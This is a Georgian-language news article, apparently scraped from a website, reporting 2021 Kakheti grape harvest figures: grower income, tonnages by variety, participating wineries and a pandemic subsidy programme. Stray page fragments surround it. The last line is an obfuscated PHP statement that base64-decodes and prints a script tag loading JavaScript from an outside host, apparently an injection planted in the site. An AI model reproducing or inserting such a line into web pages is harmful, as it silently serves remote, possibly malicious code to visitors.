celsiusi
ავერსი შნაიდერი
20 სექტემბრის მონაცემებით, კახეთში,  15 ათასამდე მევენახემ ყურძნის რეალიზაციით  160 მლნ ლარამდე შემოსავალი  მიიღო.
 
როგორც Business Time-ს ღვინის ეროვნული სააგენტოდან აცნობეს, გადამუშავებული ყურძნიდან 87 ათას ტონამდე რქაწითელია, 52 ათას ტონამდე საფერავი,  3 ათას ტონამდე კახური მწვანე, დანარჩენი სხვადასხვა ჯიშის ყურძენია.
 
ყურძნის გადამუშავების პროცესში რთველის დაწყებიდან დღემდე 185 დიდი, მცირე და საშუალო ღვინის საწარმო იყო ჩართული.
 
საქართველოს მთავრობის გადაწყვეტილებით, 2021 წლის რთველის მხარდასაჭერად, სუბსიდირების პროგრამა მოქმდებს. 
 
პროგრამის მიზანია, პანდემიით გამოწვეული ვითარება უარყოფითად არ აისახოს მევენახე ფერმერებზე და ღვინის მწარმოებლებზე, სრულად დაბინავდეს ყურძნის მოსავალი.
1005
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");